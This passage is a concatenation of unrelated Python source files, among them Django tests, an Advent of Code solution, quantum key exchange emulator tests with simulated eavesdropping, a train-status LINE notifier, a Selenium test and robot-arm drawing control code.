XFORM_INDEX_INFO, USER_INDEX_INFO]]\n\n cls.domain = Domain(name='test-b9289e19d819')\n cls.domain.save()\n\n @classmethod\n def tearDownClass(cls):\n cls.domain.delete()\n for es in cls.es:\n ensure_index_deleted(es['info'].index)\n super(BaseCalculatedPropertiesTest, cls).tearDownClass()\n\n def setUp(self):\n for es in self.es:\n ensure_index_deleted(es['info'].index)\n initialize_index_and_mapping(es['instance'], es['info'])\n\n @staticmethod\n def create_sms_in_es(domain_name, direction):\n sms_doc = {\n '_id': 'some_sms_id',\n 'domain': domain_name,\n 'direction': direction,\n 'date': json_format_datetime(datetime.datetime.utcnow()),\n 'doc_type': SMS_INDEX_INFO.type,\n }\n send_to_elasticsearch(\"sms\", sms_doc)\n refresh_elasticsearch_index('sms')\n return sms_doc\n\n @staticmethod\n def delete_sms_in_es(sms_doc):\n send_to_elasticsearch(\"sms\", sms_doc, delete=True)\n refresh_elasticsearch_index('sms')\n\n\nclass DomainCalculatedPropertiesTest(BaseCalculatedPropertiesTest):\n\n def test_calculated_properties_are_serializable(self):\n sms_doc = self.create_sms_in_es(self.domain.name, INCOMING)\n self.addCleanup(self.delete_sms_in_es, sms_doc)\n all_stats = all_domain_stats()\n props = calced_props(self.domain, self.domain._id, all_stats)\n json.dumps(props)\n\n def test_domain_does_not_have_apps(self):\n sms_doc = self.create_sms_in_es(self.domain.name, INCOMING)\n self.addCleanup(self.delete_sms_in_es, sms_doc)\n all_stats = all_domain_stats()\n props = 
calced_props(self.domain, self.domain._id, all_stats)\n self.assertFalse(props['cp_has_app'])\n\n\nclass GetSMSCountTest(BaseCalculatedPropertiesTest):\n\n def test_sms_count(self):\n sms_doc = self.create_sms_in_es(self.domain.name, INCOMING)\n self.addCleanup(self.delete_sms_in_es, sms_doc)\n self.assertEqual(SMSES().count(), 1)\n self.assertEqual(sms(self.domain.name, INCOMING), 1)\n self.assertEqual(sms(self.domain.name, OUTGOING), 0)\n\n def test_days_as_str_is_valid(self):\n sms_doc = self.create_sms_in_es(self.domain.name, INCOMING)\n self.addCleanup(self.delete_sms_in_es, sms_doc)\n count = get_sms_count(self.domain.name, days='30')\n self.assertEqual(count, 1)\n","sub_path":"corehq/apps/domain/tests/test_domain_calculated_properties.py","file_name":"test_domain_calculated_properties.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"158607044","text":"# 1. Create the adjency matrix for the bags\n# 2. Work backwards to see which bags can fit our sophisticated bag\n\nimport numpy as np\n\nwith open('input') as datafile:\n data = datafile.read()\n data = data.strip().split('\\n')\n #data = [(bagtype, [(num, bagtype),...]), ...]\n data = [line.split(' bags contain ') for line in data]\n data = [(bagtype, [(int(c.split()[0]), ' '.join(c.split()[1:3])) for c in content.split(', ') if c[0] != 'n']) for (bagtype, content) in data]\n\nbagtypes = [entry[0] for entry in data]\n\n# 1.\nN = len(bagtypes)\nadjmat = np.zeros((N,N), dtype=int)\n\nfor row, entry in enumerate(data):\n for count, bag in entry[1]:\n col = bagtypes.index(bag)\n adjmat[row,col] = count\n\n# 2.\nptr = 0\nadjmat = adjmat.transpose()\ncompatible = list(np.where(adjmat[bagtypes.index('shiny gold')] != 0)[0])\n\nwhile ptr < len(compatible):\n bagnum = compatible[ptr]\n # print('Checking for', bagtypes[bagnum])\n for bag in np.where(adjmat[bagnum] != 0)[0]:\n # print(ptr, bagnum, bagtypes[bagnum], bagtypes[bag])\n if bag not in compatible:\n compatible.append(bag)\n ptr += 1\n\nprint(len(compatible))#, compatible)\n","sub_path":"Day 7: Handy Haversacks/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"157918456","text":"import rtmidi\n\n\nmidi_out = rtmidi.MidiOut()\nports = midi_out.get_ports()\n\nfor idx, port in enumerate(ports):\n print(f'{idx}: {port}')\nselected_port = input()\n\nmidi_out.open_port(int(selected_port))\n\n# Program change (patterns)\npattern = 0 # pattern 1\nbank = 0 # bank A\nmidi_out.send_message([0xC0, pattern + bank * 16])\n\n# Control Change (Continuous Controllers)\nmidi_out.send_message([0xB0, 82, 127]) # Channel 1, control 82, value 127\n","sub_path":"examples/ex3_control.py","file_name":"ex3_control.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"63189717","text":"#!/usr/bin/env python3\n# ---------------------------------------------------------------------------\n__author__ = \"HK Transfield\"\n# ---------------------------------------------------------------------------\n\"\"\"Unit tests for the Emulation module.\n\nThis test QKE.Emulation module, including the secure exchange of a \nsymmetrically encrypted message using the key produced by QKE.\n\nIt is then followed with tests for a confidentiality man-in-the-middle attack to test\nif it is possible to decpiher 
the exchanged secret message.\n\"\"\"\n# ---------------------------------------------------------------------------\n\nfrom random import randint\n\nfrom unittest import TestCase\nfrom QKE.Emulation import QKEEmulator\n\nqubit_lengths = [16, 256, 1048]\n\nemulate_standard = QKEEmulator(qubit_length=qubit_lengths[randint(0, 2)],\n message_length=randint(16, 4096))\n\nemulate_intercept = QKEEmulator(qubit_length=qubit_lengths[randint(0, 2)],\n message_length=randint(16, 4096),\n run_type=\"intercept\")\n\nemulate_mitm = QKEEmulator(qubit_length=qubit_lengths[randint(0, 2)],\n message_length=randint(16, 4096),\n run_type=\"attack\")\n\n\nclass TestQKE(TestCase):\n def test_QKE(self):\n \"\"\"Test 1\n \n This asserts that the keys generated by Alice and Bob are the same.\n \"\"\"\n\n do_keys_match = emulate_standard.run_QKE()\n self.assertTrue(do_keys_match)\n\n def test_symmetric_encryption(self):\n \"\"\"Test 2\n\n This test asserts that Alice and Bob can successfully perform symmetric \n encryption using the generated secret key. Alice should be able to encrypt \n a message using that key and send it to Bob, who can then decrypt it with \n the same key.\n \"\"\"\n\n do_messages_match = emulate_standard.run_symmetric_encryption()\n self.assertTrue(do_messages_match)\n\n def test_intercept_resend(self):\n \"\"\"Test 3\n \n This test asserts that when Eve intercepts the qubit stream and measures\n them using her own polarizations then it should result in Bob and Alice's\n keys no longer matching.\n \"\"\"\n\n intercept_results = emulate_intercept.run_QKE()\n self.assertFalse(intercept_results)\n\n def test_mitm_QKE(self):\n \"\"\"Test 4\n\n This test asserts that if Eve intercepts the qubit stream and measures\n them using Bob's polarizations it will result in the same keys as Bob\n and Alice\n \"\"\"\n mitm_QKE_results = emulate_mitm.run_QKE()\n self.assertTrue(mitm_QKE_results)\n\n def test_mitm_encryption(self):\n \"\"\"Test 5\n \n This test asserts that if Eve has the same key as Alice and Bob, she can\n then decipher the encrypted message sent using the key.\n \"\"\"\n mitm_encryption_results = emulate_mitm.run_symmetric_encryption()\n self.assertTrue(mitm_encryption_results)","sub_path":"Tests/test_emulation.py","file_name":"test_emulation.py","file_ext":"py","file_size_in_byte":3014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"278338224","text":"# encoding: utf-8\n\"\"\"\n最大子数列问题的目标是在数列的一维方向找到一个连续的子数列,使该子数列的和最大\nhttps://blog.51cto.com/u_14724308/4740310#:~:text=%E6%9C%80%E5%A4%A7%E5%AD%90%E5%BA%8F%E5%88%97%E5%92%8C%E6%98%AF,%E8%BF%9E%E7%BB%AD%E5%AD%90%E6%95%B0%E7%BB%84%E6%9C%80%E5%A4%A7%E5%92%8C%E3%80%82\n\n1. 初始化0list;\n2. 对第一个状态值赋值;\n3. 判断上一个状态值是否小于0\n4. 小于就需要重新开始,将当前只给到状态,否则就需要相加前1历史状态;\n5. 
每次循环更新最大值;\n\"\"\"\n\narr = [1, -1, -2, 10, 2, -3, 5]\ntable = [0] * len(arr)\ntable[0] = arr[0]\nmaxvalue = arr[0]\nfor i in range(1, len(arr)):\n # 更新dp表\n if table[i - 1] < 0:\n table[i] = arr[i] # 舍弃前面部分重新开始\n else:\n table[i] = table[i - 1] + arr[i] # 新加入\n # 更新最大值\n maxvalue = max(maxvalue, table[i])\nprint(maxvalue)","sub_path":"algo/动态规划1/2最大连续子数列和.py","file_name":"2最大连续子数列和.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"625182989","text":"## coding: UTF-8\n# スクレイピングに必要なモジュールをインポート\nimport urllib.request as req\n#from urllib3 import request\nimport sys\nsys.path.append('/home/pi/.local/lib/python3.5/site-packages/')\nfrom bs4 import BeautifulSoup\nimport requests\n\n#ここに自分のtokenを入力\nline_notify_token = ''\n\n#https://transit.yahoo.co.jp/traininfo/detail/82/0/の82の数値を変えることで東武東上線以外の路線に変更できます。\nurl = \"https://transit.yahoo.co.jp/traininfo/detail/82/0/\"\nres = req.urlopen(url)\n#res = request.urlopen(url)\nsoup = BeautifulSoup(res, \"lxml\")\n\ntrain = soup.select_one(\"#main > div.mainWrp > div.labelLarge > h1\").text\nprint(train)\nstatus = soup.select_one(\"#mdServiceStatus > dl > dt\").text\nprint(status)\n\ninfo = soup.select_one(\"#mdServiceStatus > dl > dd > p\").text\nprint(info)\nprint(str(train) + \":\" + str(status) + \" \" + str(info))\n#message1()\n\nline_notify_api = 'https://notify-api.line.me/api/notify'\nmessage = str(train) + \":\" + str(status) + \" \" + str(info)\n\nif not status == \"[○]平常運転\":\n payload = {'message': message}\n headers = {'Authorization': 'Bearer ' + line_notify_token}\n line_notify = requests.post(line_notify_api,data = payload,headers=headers)","sub_path":"venv/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"431448862","text":"from selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.support.select import Select\nfrom selenium.webdriver.support.wait import WebDriverWait\n\n\ndef test_1():\n\n chrome_options = Options()\n chrome_options.add_argument(\"--window-size=1600,900\")\n driver = webdriver.Chrome(executable_path='/Users/dmitrijanaskin/PycharmProjects/lessons/webdrivers/chromedriver',\n chrome_options=chrome_options)\n driver.get('https://yandex.ru')\n\n def get_element(xpath):\n try:\n element = WebDriverWait(driver, 20).until(\n expected_conditions.presence_of_element_located((By.XPATH, xpath)))\n except TimeoutException:\n element = driver.find_element(By.XPATH, xpath)\n return element\n\n def action(element, *args):\n element_type = element.tag_name\n if element_type == 'input':\n element.send_keys(*args)\n elif element_type == 'button' or element_type == 'a':\n element.click()\n elif element_type == 'select':\n if args[0].__class__ == str:\n Select(element).select_by_value(args[0])\n\n input_search = get_element('//input[@aria-label=\"Запрос\"]')\n button_search = get_element('//button//*[text()=\"Найти\"]/..')\n\n action(input_search, 'википедия')\n action(button_search)\n\n first_result = get_element('((//*[@class=\"main__content\"]//li)[1]//a)[1]')\n action(first_result)\n\n driver.switch_to.window(driver.window_handles[1])\n\n button = get_element('//*[text()=\"Вклад\"]')\n action(button)\n\n 
def print_tag(element):\n print(element.tag_name)\n\n select = get_element('//*[@class=\"namespaceselector\"]')\n action(select, 'Обусждение')\n\n\n\n\n\n\n\n print()\n\n\n\n","sub_path":"features/steps/tests/test_1.py","file_name":"test_1.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"228892221","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('addresses', '0001_initial'),\n ('courses', '0002_auto_20141208_1034'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Dossier',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('favorite_color', models.CharField(max_length=1, choices=[(b'r', b'red'), (b'o', b'orange'), (b'y', b'yellow'), (b'g', b'green'), (b'b', b'blue'), (b'i', b'indigo'), (b'v', b'violet')])),\n ('address', models.ForeignKey(to='addresses.Address')),\n ('unloved_courses', models.ManyToManyField(to='courses.Course')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"dossiers/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"596708911","text":" #!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport argparse\nimport warnings\nimport ctypes\nimport os\nimport numpy as np\nimport time\nimport argparse\nimport ctypes\nfrom math import sqrt\nimport ik as ik\nfrom draw import *\nfrom dynamixel_sdk import * # Uses Dynamixel SDK library\nfrom skip import skip\nfrom play_sound import *\n\n# Ready to remove\nimport sys\nsys.setrecursionlimit(10000)\n\n# Parameters for Program Drawing\n'''\nBeh: check the best H_draw for the workspace\n'''\n# Pen length = 4.5cm\nH_move = 8.0 # variable + offset ->> 2+4\nH_draw = 1.3 # variable + offset ->> -2.3+4\nfilename = \"Image/prof_low_actual.png\"\n\ndrawer = Drawer(filename,H_draw,H_move,False)\ndrawer.findPath()\n\n# Program Parameters for Dynamixel Servos\nprint_param = False # printing status of Dynamixel Servos\ntesting = False\nmin_X = 9\nmax_X = 35\nmin_Y =-15\nmax_Y = 15\n\nif os.name == 'nt':\n import msvcrt\n\n def getch():\n return msvcrt.getch().decode()\nelse:\n import sys\n import tty\n import termios\n\n fd = sys.stdin.fileno()\n old_settings = termios.tcgetattr(fd)\n\n\n def getch():\n try:\n tty.setraw(sys.stdin.fileno())\n ch = sys.stdin.read(1)\n finally:\n termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)\n return ch\n\ndef user_input(id):\n val = float(input(\n \"Enter Goal Position for Motor {} in degrees (Range is 0 to 300 degrees; 150 degrees is neutral position):\".format(\n id)))\n return val, int(val / 300 * 1023)\n\ndef get_offset(val):\n if 9<=val<=11:\n offset = (-2*val) +19.5\n if 11= BROADCAST_ID:\n # return data, COMM_NOT_AVAILABLE, 0\n\n # txpacket[self.PKT_ID] = dxl_id\n # txpacket[self.PKT_LENGTH] = 4\n # txpacket[self.PKT_INSTRUCTION] = INST_READ\n # txpacket[self.PKT_PARAMETER0 + 0] = address\n # txpacket[self.PKT_PARAMETER0 + 1] = length\n\n # rxpacket, result, error = self.txRxPacket(port, txpacket)\n # if result == COMM_SUCCESS:\n # error = rxpacket[self.PKT_ERROR]\n\n # data.extend(rxpacket[PKT_PARAMETER0: PKT_PARAMETER0 + length])\n\n # return data, result, error\n\n # def txRxPacket(self, port, txpacket):\n # rxpacket = 
None\n # error = 0\n\n # # tx packet\n # result = self.packetHandler.txPacket(port, txpacket)\n # if result != COMM_SUCCESS:\n # return rxpacket, result, error\n\n # # (Instruction == BulkRead) == this function is not available.\n # if txpacket[self.PKT_INSTRUCTION] == INST_BULK_READ:\n # result = COMM_NOT_AVAILABLE\n\n # # (ID == Broadcast ID) == no need to wait for status packet or not available\n # if (txpacket[self.PKT_ID] == BROADCAST_ID):\n # port.is_using = False\n # return rxpacket, result, error\n\n # # set packet timeout\n # if txpacket[self.PKT_INSTRUCTION] == INST_READ:\n # port.setPacketTimeout(txpacket[self.PKT_PARAMETER0 + 1] + 6)\n # else:\n # port.setPacketTimeout(6) # HEADER0 HEADER1 ID LENGTH ERROR CHECKSUM\n\n # # rx packet\n # while True:\n # rxpacket, result = self.rxPacket(port)\n # if result != COMM_SUCCESS or txpacket[self.PKT_ID] == rxpacket[self.PKT_ID]:\n # break\n\n # if result == COMM_SUCCESS and txpacket[self.PKT_ID] == rxpacket[self.PKT_ID]:\n # error = rxpacket[self.PKT_ERROR]\n\n # return rxpacket, result, error\n\n # def rxPacket(self, port):\n # rxpacket = []\n\n # result = COMM_TX_FAIL\n # checksum = 0\n # rx_length = 0\n # wait_length = 10 # minimum length (HEADER0 HEADER1 ID LENGTH ERROR CHKSUM)\n # # FIX: CHANGED 6 TO 10 for read_pos\n\n # while True:\n # rxpacket.extend(port.readPort(wait_length - rx_length))\n # rx_length = len(rxpacket)\n # if rx_length >= wait_length:\n # # find packet header\n # for idx in range(0, (rx_length - 1)):\n # if (rxpacket[idx] == 0xFF) and (rxpacket[idx + 1] == 0xFF):\n # break\n\n # if idx == 0: # found at the beginning of the packet\n # if (rxpacket[self.PKT_ID] > 0xFD) or (rxpacket[self.PKT_LENGTH] > RXPACKET_MAX_LEN) or (\n # rxpacket[self.PKT_ERROR] > 0x7F):\n # # unavailable ID or unavailable Length or unavailable Error\n # # remove the first byte in the packet\n # del rxpacket[0]\n # rx_length -= 1\n # continue\n\n # # re-calculate the exact length of the rx packet\n # if wait_length != (rxpacket[self.PKT_LENGTH] + self.PKT_LENGTH + 1):\n # wait_length = rxpacket[self.PKT_LENGTH] + self.PKT_LENGTH + 1\n # continue\n\n # if rx_length < wait_length:\n # # check timeout\n # if port.isPacketTimeout():\n # if rx_length == 0:\n # result = COMM_RX_TIMEOUT\n # else:\n # result = COMM_RX_CORRUPT\n # break\n # else:\n # continue\n\n # # calculate checksum\n # for i in range(2, wait_length - 1): # except header, checksum\n # checksum += rxpacket[i]\n # checksum = ~checksum & 0xFF\n\n # # verify checksum\n # if rxpacket[wait_length - 1] == checksum:\n # result = COMM_SUCCESS\n # else:\n # result = COMM_RX_CORRUPT\n # break\n\n # else:\n # # remove unnecessary packets\n # del rxpacket[0: idx]\n # rx_length -= idx\n\n # else:\n # # check timeout\n # if port.isPacketTimeout():\n # if rx_length == 0:\n # result = COMM_RX_TIMEOUT\n # else:\n # result = COMM_RX_CORRUPT\n # break\n\n # port.is_using = False\n\n # #print \"[RxPacket] %r\" % rxpacket\n\n # return rxpacket, result\n # # end fix\n\n # def read_pos(self, id):\n # dxl_present_position, dxl_comm_result, dxl_error = self.read4ByteTxRx(self.portHandler, id, self.ADDR_MX_PRESENT_POSITION)\n # if dxl_comm_result != COMM_SUCCESS:\n # return self.read_pos(id)\n # elif dxl_error != 0:\n # return self.read_pos(id)\n # else:\n # if(dxl_present_position > 1023 or dxl_present_position<0):\n # return self.read_pos(id)\n # return dxl_present_position, dxl_comm_result, dxl_error\n\n # Set servo move speed\n def set_joint_speed(self, id, speed):\n dxl_comm_result, dxl_error = 
self.packetHandler.write2ByteTxRx(self.portHandler, id, self.ADDR_AX12A_MOVE_SPEED,\n int(speed))\n # print(\"Set Speed \",id,'---',dxl_comm_result,'---',dxl_error)\n if dxl_comm_result != COMM_SUCCESS:\n return self.set_joint_speed(id, speed)\n elif dxl_error != 0:\n return self.set_joint_speed(id, speed)\n else:\n # print(\"Dynamixel#%d speed has been set: %s\" % (id, speed))\n return 1\n\n def enable_servo_torque(self, id):\n dxl_comm_result, dxl_error = self.packetHandler.write1ByteTxRx(self.portHandler, id, self.ADDR_MX_TORQUE_ENABLE,\n self.TORQUE_ENABLE)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % self.packetHandler.getTxRxResult(dxl_comm_result))\n elif dxl_error != 0:\n print(\"%s\" % self.packetHandler.getRxPacketError(dxl_error))\n else:\n print(\"Dynamixel#%d has been successfully connected\" % id)\n\n def disable_servo_torque(self, id):\n dxl_comm_result, dxl_error = self.packetHandler.write1ByteTxRx(self.portHandler, id, self.ADDR_MX_TORQUE_ENABLE,\n self.TORQUE_DISABLE)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % self.packetHandler.getTxRxResult(dxl_comm_result))\n elif dxl_error != 0:\n print(\"%s\" % self.packetHandler.getRxPacketError(dxl_error))\n\n # Function to setup parameters for dynamixel sync write\n def add_params(self, id,params):\n dxl_addparam_result = self.groupSyncWrite.addParam(id, params)\n if dxl_addparam_result != True:\n print(\"[ID:%03d] groupSyncWrite addparam failed. Retrying...\" % id)\n self.add_params(id,params)\n\n def goal_send(self,id,position):\n _, _ = self.packetHandler.write2ByteTxRx(self.portHandler, id, self.ADDR_MX_GOAL_POSITION, position)\n\n def print_status(self, id, goal_position, present_position):\n print(\"[ID: {} GoalPos: {:.03f} PresPos: {:.03f} ]\".format(id, goal_position, present_position))\n\ndef move_to(status_moving):\n # Allocate goal position value into byte array\n param_goal_position_6 = [DXL_LOBYTE(DXL_LOWORD(GoalPosition_6)), DXL_HIBYTE(DXL_LOWORD(\n GoalPosition_6)), DXL_LOBYTE(DXL_HIWORD(GoalPosition_6)), DXL_HIBYTE(DXL_HIWORD(GoalPosition_6))]\n param_goal_position_1 = [DXL_LOBYTE(DXL_LOWORD(GoalPosition_1)), DXL_HIBYTE(DXL_LOWORD(\n GoalPosition_1)), DXL_LOBYTE(DXL_HIWORD(GoalPosition_1)), DXL_HIBYTE(DXL_HIWORD(GoalPosition_1))]\n param_goal_position_2 = [DXL_LOBYTE(DXL_LOWORD(GoalPosition_2)), DXL_HIBYTE(DXL_LOWORD(\n GoalPosition_2)), DXL_LOBYTE(DXL_HIWORD(GoalPosition_2)), DXL_HIBYTE(DXL_HIWORD(GoalPosition_2))]\n param_goal_position_3 = [DXL_LOBYTE(DXL_LOWORD(GoalPosition_3)), DXL_HIBYTE(DXL_LOWORD(\n GoalPosition_3)), DXL_LOBYTE(DXL_HIWORD(GoalPosition_3)), DXL_HIBYTE(DXL_HIWORD(GoalPosition_3))]\n \n if status_moving:\n # print(\"one by one\")\n servo.goal_send(servo.DXL_ID_6, GoalPosition_6)\n servo.goal_send(servo.DXL_ID_3, GoalPosition_3)\n servo.goal_send(servo.DXL_ID_1, GoalPosition_1)\n servo.goal_send(servo.DXL_ID_2, GoalPosition_2)\n else:\n # Send goal to syncwrite storage\n servo.add_params(servo.DXL_ID_6, param_goal_position_6)\n servo.add_params(servo.DXL_ID_1, param_goal_position_1)\n servo.add_params(servo.DXL_ID_2, param_goal_position_2)\n servo.add_params(servo.DXL_ID_3, param_goal_position_3)\n\n # Syncwrite goal position\n dxl_comm_result = servo.groupSyncWrite.txPacket()\n\n if dxl_comm_result != COMM_SUCCESS:\n print(\"dynamixel_write result error %s\" % servo.packetHandler.getTxRxResult(dxl_comm_result))\n \n # Clear syncwrite parameter storage\n servo.groupSyncWrite.clearParam()\n\n wait = time.time()\n # print(\"Time: {}\".format(wait))\n\n while 1:\n # Read 
present position\n dxl_present_position_6, _, _ = servo.read_pos(servo.DXL_ID_6)\n dxl_present_position_1, _, _ = servo.read_pos(servo.DXL_ID_1)\n dxl_present_position_2, _, _ = servo.read_pos(servo.DXL_ID_2)\n dxl_present_position_3, _, _ = servo.read_pos(servo.DXL_ID_3)\n\n dxl_present_position_6_deg = dxl_present_position_6 / 1023.0 * 300.0\n dxl_present_position_1_deg = dxl_present_position_1 / 1023.0 * 300.0\n dxl_present_position_2_deg = dxl_present_position_2 / 1023.0 * 300.0\n dxl_present_position_3_deg = dxl_present_position_3 / 1023.0 * 300.0\n\n # Print Statues\n if print_param:\n servo.print_status(servo.DXL_ID_3, GoalPosition_3_deg, dxl_present_position_3_deg)\n servo.print_status(servo.DXL_ID_6, GoalPosition_6_deg, dxl_present_position_6_deg)\n servo.print_status(servo.DXL_ID_2, GoalPosition_2_deg, dxl_present_position_2_deg)\n servo.print_status(servo.DXL_ID_1, GoalPosition_1_deg, dxl_present_position_1_deg)\n\n status_6 = (abs(GoalPosition_6 - dxl_present_position_6) <= servo.DXL_MOVING_STATUS_THRESHOLD)\n print(\"--Servo 6 Status: {}--\".format(status_6))\n \n if ((abs(GoalPosition_6 - dxl_present_position_6) <= servo.DXL_MOVING_STATUS_THRESHOLD) and \\\n (abs(GoalPosition_1 - dxl_present_position_1) <= servo.DXL_MOVING_STATUS_THRESHOLD) and \\\n (abs(GoalPosition_2 - dxl_present_position_2) <= servo.DXL_MOVING_STATUS_THRESHOLD) and \\\n (abs(GoalPosition_3 - dxl_present_position_3) <= servo.DXL_MOVING_STATUS_THRESHOLD)):\n break\n elif time.time() - wait > 10:\n print(\"arm is Blocked, breaking loop\")\n break\n\ndef set_variable_speed():\n # Read Pos of Servo\n dxl6_present_position, _, _ = servo.read_pos(servo.DXL_ID_6)\n dxl1_present_position, _, _ = servo.read_pos(servo.DXL_ID_1)\n dxl2_present_position, _, _ = servo.read_pos(servo.DXL_ID_2)\n dxl3_present_position, _, _ = servo.read_pos(servo.DXL_ID_3)\n \n diff3 = abs(GoalPosition_3-dxl3_present_position)\n diff2 = abs(GoalPosition_2-dxl2_present_position)\n diff1 = abs(GoalPosition_1-dxl1_present_position)\n diff6 = abs(GoalPosition_6-dxl6_present_position)\n\n reduct = 1\n # print(\"Angle difference is %s and reduction value is %s\" %([diff1,diff2,diff3,diff6],reduct))\n if diff1 > 100:\n # print(\"apply speed limit 1\")\n diff2 = diff2 * reduct * 100/diff1\n diff3 = diff3 * reduct * 100/diff1\n diff6 = diff6 * reduct * 100/diff1\n diff1 = diff1 * reduct * 100/diff1\n if diff2 > 100:\n # print(\"apply speed limit 2\")\n diff1 = diff1 * reduct * 100/diff2\n diff3 = diff3 * reduct * 100/diff2\n diff6 = diff6 * reduct * 100/diff2\n diff2 = diff2 * reduct * 100/diff2\n if diff3 > 100:\n # print(\"apply speed limit 3\")\n diff1 = diff1 * reduct * 100/diff3\n diff2 = diff2 * reduct * 100/diff3\n diff6 = diff6 * reduct * 100/diff3\n diff3 = diff3 * reduct * 100/diff3\n if diff6 > 100:\n # print(\"apply speed limit 4\")\n diff1 = diff1 * reduct * 100/diff6\n diff2 = diff2 * reduct * 100/diff6\n diff3 = diff3 * reduct * 100/diff6\n diff6 = diff6 * reduct * 100/diff6\n\n diff1 = int(diff1)\n diff2 = int(diff2)\n diff3 = int(diff3)\n diff6 = int(diff6)\n\n if (diff1 == 0):\n diff1 = 1\n if (diff2 == 0):\n diff2 = 1\n if (diff3 == 0):\n diff3 = 1\n if (diff6 == 0):\n diff6 = 1\n\n servo.set_joint_speed(servo.DXL_ID_1,(diff1))\n servo.set_joint_speed(servo.DXL_ID_2,(diff2))\n servo.set_joint_speed(servo.DXL_ID_3,(diff3))\n servo.set_joint_speed(servo.DXL_ID_6,(diff6))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Dynamixel Servo Control')\n parser.add_argument('--user_input', 
action='store_false', help='ignore this argument in order to ask goal from program')\n args = parser.parse_args()\n\n servo = Dynamixel(args)\n\n # Enable Dynamixel Torque\n servo.enable_servo_torque(servo.DXL_ID_6)\n servo.enable_servo_torque(servo.DXL_ID_1)\n servo.enable_servo_torque(servo.DXL_ID_2)\n servo.enable_servo_torque(servo.DXL_ID_3)\n\n # Set Speed of Servo\n joint_speed = 40\n servo.set_joint_speed(servo.DXL_ID_6, joint_speed)\n servo.set_joint_speed(servo.DXL_ID_3, joint_speed)\n servo.set_joint_speed(servo.DXL_ID_2, joint_speed)\n servo.set_joint_speed(servo.DXL_ID_1, joint_speed)\n\n # Go to home position \n GoalPosition_3_deg, GoalPosition_3=program_input(150)\n GoalPosition_1 = GoalPosition_6 = GoalPosition_2 = GoalPosition_3\n GoalPosition_1_deg = GoalPosition_6_deg = GoalPosition_2_deg = GoalPosition_3_deg\n set_variable_speed() # -> test\n move_to(True)\n\n while 1:\n if servo.user_input:\n # User input goal position\n GoalPosition_3_deg, GoalPosition_3 = user_input(3)\n GoalPosition_6_deg, GoalPosition_6 = user_input(6)\n GoalPosition_2_deg, GoalPosition_2 = user_input(2)\n GoalPosition_1_deg, GoalPosition_1 = user_input(1)\n\n set_variable_speed()\n\n move_to(True) # True: Not syncwrite\n\n else: \n if not testing:\n print(\"Start drawing\")\n # Drawing from input image\n arr = drawer.draw()\n\n print(\"Number of point to IK: {}\".format(len(arr)))\n arr=np.asarray(arr)\n\n # Factor x coordinate & y coordinate\n for i in arr:\n i[0] = i[0]*0.05\n i[1] = i[1]*0.05\n\n arr = np.round(arr,1) \n\n arr = arr.tolist() \n arr = skip(arr,drawer.h_move,drawer.h_draw)\n print(\"After F Number of point to IK: {}\".format(len(arr)))\n arr=np.asarray(arr)\n\n offset_y , offset_x = plot(arr,False,False)\n\n # Array slicing here!!! \n # arr=arr[200:]\n \n \n else:\n print(\"Testing\")\n arr = [[min_X,max_Y,H_move],\n [min_X,max_Y,H_draw],\n [min_X,min_Y,H_draw],\n [max_X,min_Y,H_draw],\n [max_X,max_Y,H_draw],\n [min_X,max_Y,H_draw],\n [min_X,max_Y,H_move]]\n\n size_arr = len(arr)\n arr_store = arr \n\n for index, i in enumerate(arr):\n if(int(i[2])==int(H_move) or int(arr_store[index-1][2])==int(H_move)):\n status_move = True\n else:\n status_move = False\n\n if print_param: \n print(\"Status_move :{}\".format(status_move))\n\n if not testing:\n # Drawing from input image\n print(\"Start sending the point\")\n # x_coor = int(i[0])+ offset_x\n # y_coor = int(i[1])-offset_y\n y_coor = int(i[0])-offset_y\n x_coor = int(i[1])+offset_x\n print(\"From Drawing for point {}/{}:\".format(index+1,size_arr),i[0]+10-4, i[1]-15,i[2])\n arr = ik.get_inverse(i[1]+offset_x, i[0]-offset_y,i[2]) \n\n else:\n x_coor = int(i[0])\n y_coor = int(i[1])\n\n print(\"From Drawing: \",i[0], i[1],i[2])\n val = sqrt(i[0]**2 + i[1]**2)\n offset = get_offset(val)\n print(\"val: {0} offset:{1}\".format(val,offset))\n \n arr = ik.get_inverse(i[0], i[1],i[2]) \n\n arr[3] = -arr[3]\n arr = [i + 150.0 for i in arr]\n # print(\"From IK(after +150): \",arr)\n \n GoalPosition_3_deg, GoalPosition_3 = program_input(arr[0])\n GoalPosition_6_deg, GoalPosition_6 = program_input(arr[1])\n GoalPosition_2_deg, GoalPosition_2 = program_input(arr[2])\n GoalPosition_1_deg, GoalPosition_1 = program_input(arr[3])\n\n set_variable_speed()\n\n if 